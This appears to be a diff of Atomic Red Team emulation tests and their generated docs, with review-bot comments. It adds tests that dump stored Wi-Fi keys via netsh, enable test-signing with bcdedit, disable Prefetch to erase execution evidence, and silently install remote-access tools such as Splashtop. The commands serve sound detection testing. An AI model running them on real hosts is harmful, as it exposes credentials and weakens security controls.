modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -60234,6 +60235,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+4 -2
View File
@@ -6496,7 +6496,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -6519,6 +6519,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -54743,7 +54744,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -54810,6 +54811,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+4 -2
View File
@@ -5257,7 +5257,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -49514,7 +49515,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -49581,6 +49582,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+4 -2
View File
@@ -5257,7 +5257,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -5280,6 +5280,7 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
@@ -49144,7 +49145,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -49211,6 +49212,7 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
+123 -6
View File
@@ -9668,7 +9668,7 @@ defense-evasion:
Driver Loader)"
modified: '2022-05-24T14:00:00.188Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Code Signing Policy Modification
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
that could be taken to modify the code signing policy of a system, such as
<code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING
@@ -9691,7 +9691,19 @@ defense-evasion:
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
atomic_tests: []
identifier: T1553.006
atomic_tests:
- name: Code Signing Policy Modification
auto_generated_guid: bb6b51e1-ab92-45b5-aeea-e410d06405f8
description: Allows adversaries to subvert trust controls by modifying the code
signing policy, enabling the execution of unsigned drivers.
supported_platforms:
- windows
executor:
command: bcdedit /set testsigning on
cleanup_command: bcdedit /set testsigning off
name: command_prompt
elevation_required: true
T1610:
technique:
modified: '2024-04-11T21:24:42.680Z'
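Review bot: the `description: Allows adversaries to subvert trust controls ...` text states the technique's goal rather than what this test does, and it omits two facts a runner needs: `bcdedit /set testsigning on` only takes effect after a reboot, and on a host with Secure Boot enabled bcdedit refuses the change ("The value is protected by Secure Boot policy"), so the test fails there. Suggest wording it like the other tests, e.g. "Upon successful execution, the boot configuration is set to allow test-signed drivers; a reboot is required for the change to apply, and the command fails when Secure Boot is enabled." The `cleanup_command: bcdedit /set testsigning off` also assumes test signing was off beforehand; capturing the current value with `bcdedit /enum {current}` before the test and restoring that is safer. For detection purposes the bcdedit.exe command line containing `testsigning` is exactly the signal the technique's own `x_mitre_detection` text a few lines up calls out.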
@@ -11199,6 +11211,26 @@ defense-evasion:
/f >nul 2>&1)'
name: command_prompt
elevation_required: true
- name: Disable Windows Prefetch Through Registry
auto_generated_guid: 7979dd41-2045-48b2-a54e-b1bc2415c9da
description: 'Modify the registry of the machine to disable prefetch. Disabling
prefetch will remove one artifact for evidence of application execution. Restart
is required post modification
'
supported_platforms:
- windows
executor:
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 3 /f
'
name: command_prompt
elevation_required: true
T1574.008:
technique:
modified: '2023-05-09T14:00:00.188Z'
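Review bot: the `cleanup_command` unconditionally writes `EnablePrefetcher` back to `3`, which assumes that was the value before the test ran; reading the existing value with `reg query` first and restoring that would avoid changing a host that was not at the default. The description should end with a period ("Restart is required post modification."), and since the change only applies after a restart, it is worth stating that the observable for detection is the registry write itself (`reg.exe` setting `...\Memory Management\PrefetchParameters\EnablePrefetcher` to `0`), not the later absence of Prefetch artifacts.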
@@ -60895,6 +60927,10 @@ command-and-control:
description: Path of MSP360 executable
type: path
default: "$env:ProgramFiles\\Connect\\Connect.exe"
MSP360_Download_Url:
description: URL to download MSP360 Connect from
type: url
default:
dependency_executor_name: powershell
dependencies:
- description: 'MSP360 must exist at (#{MSP360_Connect_Path})
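Review bot: `MSP360_Download_Url` is declared with an empty `default:`, so without an override `#{MSP360_Download_Url}` expands to nothing and the `Invoke-WebRequest` in `get_prereq_command` later in this file fails on a clean machine. Either give the input a working default or say in its `description` that the user must supply the URL, so the failure is expected rather than mysterious.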
@@ -60906,8 +60942,8 @@ command-and-control:
'
get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\"
\"https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9\"\nstart-process
\"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\" /S \n"
\"#{MSP360_Download_Url}\"\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\msp360connect.exe\"
/S \n"
executor:
command: 'Start-Process #{MSP360_Connect_Path}
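Review bot: removing the hardcoded presigned S3 link is right (its `X-Amz-Expires=604800` counted from `X-Amz-Date=20230515T024742Z` means it stopped working a week after May 2023), but the replacement now runs `start-process "...\msp360connect.exe" /S` on whatever a user-supplied URL returns, with no integrity check. Suggest adding an input for the expected SHA-256 and verifying it with `Get-FileHash` before the silent install, or at minimum noting in the description that the downloaded installer is trusted as-is.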
@@ -60933,6 +60969,41 @@ command-and-control:
$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
Remove-Item $file1 -ErrorAction Ignore
name: powershell
- name: Splashtop Execution
auto_generated_guid: b025c580-029e-4023-888d-a42710d76934
description: |
An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
Upon successful execution, Splashtop will be executed.
supported_platforms:
- windows
input_arguments:
Splashtop_Path:
description: Path of Splashtop executable
type: path
default: "${env:programfiles(x86)}\\Splashtop\\Splashtop Remote\\Client
for STP\\strwinclt.exe"
dependency_executor_name: powershell
dependencies:
- description: 'Splashtop must exist at "#{Splashtop_Path}"
'
prereq_command: 'if (Test-Path "#{Splashtop_Path}") {exit 0} else {exit 1}
'
get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\splashtop_install.exe\"
\"https://download.splashtop.com/winclient/STP/Splashtop_Personal_Win_v3.6.6.0.exe\"\nstart-sleep
30\nstart-process \"PathToAtomicsFolder\\..\\ExternalPayloads\\splashtop_install.exe\"
/S \nstart-sleep 30 \n"
executor:
command: 'Start-Process "#{Splashtop_Path}"
'
cleanup_command: 'Stop-Process -Name "strwinclt" -force -erroraction silentlycontinue
'
name: powershell
elevation_required: true
T1659:
technique:
modified: '2023-10-01T02:28:45.147Z'
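Review bot: `cleanup_command: Stop-Process -Name "strwinclt" ...` only ends the process, while `get_prereq_command` silently installs `Splashtop_Personal_Win_v3.6.6.0.exe` and nothing removes it, so after cleanup the host still has remote-access software (and whatever autostart the installer configured) in place; either add the uninstall or state this in the description. The two fixed `start-sleep 30` waits are fragile on slow or fast hosts; `Start-Process -Wait` on the installer is deterministic. The download is version-pinned but not hash-checked, so a `Get-FileHash` comparison against a recorded value would close the same gap noted for the MSP360 test above.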
@@ -81663,7 +81734,7 @@ discovery:
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
name: Wi-Fi Discovery
name: 'System Network Configuration Discovery: Wi-Fi Discovery'
description: |
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
@@ -81730,7 +81801,19 @@ discovery:
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
spec_version: '2.1'
atomic_tests: []
identifier: T1016.002
atomic_tests:
- name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
auto_generated_guid: 53cf1903-0fa7-4177-ab14-f358ae809eec
description: Upon successful execution, information about previously connected
Wi-Fi networks will be displayed with their corresponding key (if present).
supported_platforms:
- windows
executor:
command: netsh wlan show profile * key=clear
cleanup_command:
name: command_prompt
elevation_required: false
T1010:
technique:
modified: '2023-10-31T14:00:00.188Z'
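Review bot: `cleanup_command:` is emitted with no value, which parses as null; drop the key rather than leaving it empty (the rendered markdown for this test already shows no cleanup section, so nothing is lost). The description could say what is actually exposed: `key=clear` prints the stored pre-shared key of every saved profile, which is why the full command line `netsh wlan show profile ... key=clear` is the thing to alert on, not netsh.exe on its own.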
@@ -84855,6 +84938,40 @@ discovery:
'
name: command_prompt
- name: Enumerate Remote Hosts with Netscan
auto_generated_guid: b8147c9a-84db-4ec1-8eee-4e0da75f0de5
description: This test uses Netscan to identify remote hosts in a specified
network range.
supported_platforms:
- windows
input_arguments:
netscan_path:
description: NetScan exe location
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\netscan\64-bit\netscan.exe
range_to_scan:
description: The IP range to scan with Netscan
type: string
default: 127.0.0.1-127.0.0.1
dependency_executor_name: powershell
dependencies:
- description: 'Netscan must be installed
'
prereq_command: if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
executor:
command: cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt"
/range:'#{range_to_scan}'
cleanup_command: 'remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction
silentlycontinue
'
name: powershell
elevation_required: false
T1046:
technique:
modified: '2023-08-11T21:10:09.547Z'
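Review bot: the `Expand-Archive` in `get_prereq_command` has no `-Force`, so if `...\ExternalPayloads\netscan` exists from an earlier incomplete extraction the prerequisite step fails and `prereq_command` keeps reporting the exe missing; adding `-Force` (or removing the folder first) makes it rerunnable. The `netscan_portable.zip` URL is unversioned and unverified while the default `netscan_path` hardcodes the `64-bit\netscan.exe` layout inside it, so an upstream repackaging breaks the default silently; pin a hash or note the dependency in the description. Netscan is a dual-use scanner that endpoint protection may quarantine at download time, which is worth listing as an expected failure mode. Keeping the default `range_to_scan` at `127.0.0.1-127.0.0.1` so the scan stays local is good.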
+42
View File
@@ -0,0 +1,42 @@
# T1016.002 - System Network Configuration Discovery: Wi-Fi Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/002)
<blockquote>Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.
Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi networks corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)
On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh](#atomic-test-1---enumerate-stored-wi-fi-profiles-and-passwords-via-netsh)
<br/>
## Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh
Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
**Supported Platforms:** Windows
**auto_generated_guid:** 53cf1903-0fa7-4177-ab14-f358ae809eec
#### Attack Commands: Run with `command_prompt`!
```cmd
netsh wlan show profile * key=clear
```
<br/>
+1 -1
View File
@@ -2,7 +2,7 @@ attack_technique: T1016.002
display_name: "System Network Configuration Discovery: Wi-Fi Discovery"
atomic_tests:
- name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
auto_generated_guid:
auto_generated_guid: 53cf1903-0fa7-4177-ab14-f358ae809eec
description: Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
supported_platforms:
- windows
+54
View File
@@ -51,6 +51,8 @@ Adversaries may also target discovery of network infrastructure as well as lever
- [Atomic Test #21 - Remote System Discovery - net group Domain Controller](#atomic-test-21---remote-system-discovery---net-group-domain-controller)
- [Atomic Test #22 - Enumerate Remote Hosts with Netscan](#atomic-test-22---enumerate-remote-hosts-with-netscan)
<br/>
@@ -838,4 +840,56 @@ net group /domain "Domain controllers"
<br/>
<br/>
## Atomic Test #22 - Enumerate Remote Hosts with Netscan
This test uses Netscan to identify remote hosts in a specified network range.
**Supported Platforms:** Windows
**auto_generated_guid:** b8147c9a-84db-4ec1-8eee-4e0da75f0de5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| netscan_path | NetScan exe location | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;netscan&#92;64-bit&#92;netscan.exe|
| range_to_scan | The IP range to scan with Netscan | string | 127.0.0.1-127.0.0.1|
#### Attack Commands: Run with `powershell`!
```powershell
cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
```
#### Cleanup Commands:
```powershell
remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction silentlycontinue
```
#### Dependencies: Run with `powershell`!
##### Description: Netscan must be installed
##### Check Prereq Commands:
```powershell
if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
```
<br/>
+1
View File
@@ -405,6 +405,7 @@ atomic_tests:
net group /domain "Domain controllers"
name: command_prompt
- name: Enumerate Remote Hosts with Netscan
auto_generated_guid: b8147c9a-84db-4ec1-8eee-4e0da75f0de5
description: This test uses Netscan to identify remote hosts in a specified network range.
supported_platforms:
- windows
+34
View File
@@ -150,6 +150,8 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #70 - Enable RDP via Registry (fDenyTSConnections)](#atomic-test-70---enable-rdp-via-registry-fdenytsconnections)
- [Atomic Test #71 - Disable Windows Prefetch Through Registry](#atomic-test-71---disable-windows-prefetch-through-registry)
<br/>
@@ -2583,4 +2585,36 @@ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "HKLM\SYSTEM\CurrentCon
<br/>
<br/>
## Atomic Test #71 - Disable Windows Prefetch Through Registry
Modify the registry of the machine to disable prefetch. Disabling prefetch will remove one artifact for evidence of application execution. Restart is required post modification
**Supported Platforms:** Windows
**auto_generated_guid:** 7979dd41-2045-48b2-a54e-b1bc2415c9da
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 3 /f
```
<br/>
+1
View File
@@ -1088,6 +1088,7 @@ atomic_tests:
name: command_prompt
elevation_required: true
- name: Disable Windows Prefetch Through Registry
auto_generated_guid: 7979dd41-2045-48b2-a54e-b1bc2415c9da
description: |
Modify the registry of the machine to disable prefetch. Disabling prefetch will remove one artifact for evidence of application execution. Restart is required post modification
supported_platforms:
+58 -1
View File
@@ -34,6 +34,8 @@ Installation of many remote access software may also include persistence (e.g.,
- [Atomic Test #12 - RustDesk Files Detected Test on Windows](#atomic-test-12---rustdesk-files-detected-test-on-windows)
- [Atomic Test #13 - Splashtop Execution](#atomic-test-13---splashtop-execution)
<br/>
@@ -498,6 +500,7 @@ Upon successful execution, MSP360 Connect will be executed.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| MSP360_Connect_Path | Path of MSP360 executable | path | $env:ProgramFiles&#92;Connect&#92;Connect.exe|
| MSP360_Download_Url | URL to download MSP360 Connect from | url | |
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
@@ -523,7 +526,7 @@ if (Test-Path #{MSP360_Connect_Path}) {exit 0} else {exit 1}
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" "https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9"
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" "#{MSP360_Download_Url}"
start-process "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" /S
```
@@ -566,4 +569,58 @@ Remove-Item $file1 -ErrorAction Ignore
<br/>
<br/>
## Atomic Test #13 - Splashtop Execution
An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
Upon successful execution, Splashtop will be executed.
**Supported Platforms:** Windows
**auto_generated_guid:** b025c580-029e-4023-888d-a42710d76934
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Splashtop_Path | Path of Splashtop executable | path | ${env:programfiles(x86)}&#92;Splashtop&#92;Splashtop Remote&#92;Client for STP&#92;strwinclt.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Start-Process "#{Splashtop_Path}"
```
#### Cleanup Commands:
```powershell
Stop-Process -Name "strwinclt" -force -erroraction silentlycontinue
```
#### Dependencies: Run with `powershell`!
##### Description: Splashtop must exist at "#{Splashtop_Path}"
##### Check Prereq Commands:
```powershell
if (Test-Path "#{Splashtop_Path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\splashtop_install.exe" "https://download.splashtop.com/winclient/STP/Splashtop_Personal_Win_v3.6.6.0.exe"
start-sleep 30
start-process "PathToAtomicsFolder\..\ExternalPayloads\splashtop_install.exe" /S
start-sleep 30
```
<br/>
+1
View File
@@ -286,6 +286,7 @@ atomic_tests:
Remove-Item $file1 -ErrorAction Ignore
name: powershell
- name: Splashtop Execution
auto_generated_guid: b025c580-029e-4023-888d-a42710d76934
description: |
An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
Upon successful execution, Splashtop will be executed.
+43 -6
View File
@@ -1,10 +1,47 @@
# T1553.006 - Subvert Trust Controls: Code Signing Policy Modification
# T1553.006 - Subvert Trust Controls: Code Signing Policy Modification
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/006)
<blockquote>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.
<blockquote>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS. Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, Modify Registry, rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory. Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS. Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)
To gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct Exploitation for Privilege Escalation using a signed, but vulnerable driver.
</blockquote>
To gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Code Signing Policy Modification](#atomic-test-1---code-signing-policy-modification)
<br/>
## Atomic Test #1 - Code Signing Policy Modification
Allows adversaries to subvert trust controls by modifying the code signing policy, enabling the execution of unsigned drivers.
**Supported Platforms:** Windows
**auto_generated_guid:** bb6b51e1-ab92-45b5-aeea-e410d06405f8
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
bcdedit /set testsigning on
```
#### Cleanup Commands:
```cmd
bcdedit /set testsigning off
```
<br/>
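Review bot: the title line and the first `<blockquote>` line of this file are removed and re-added with identical visible text, which points to trailing-whitespace differences in the generator output; normalizing whitespace before writing would keep these doc regenerations limited to real changes. The Atomic Test #1 description here inherits the YAML wording flagged above (reboot requirement and Secure Boot behaviour missing), so fixing the YAML will fix this file on the next generation.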
+1
View File
@@ -2,6 +2,7 @@ attack_technique: T1553.006
display_name: 'Subvert Trust Controls: Code Signing Policy Modification'
atomic_tests:
- name: Code Signing Policy Modification
auto_generated_guid: bb6b51e1-ab92-45b5-aeea-e410d06405f8
description: Allows adversaries to subvert trust controls by modifying the code signing policy, enabling the execution of unsigned drivers.
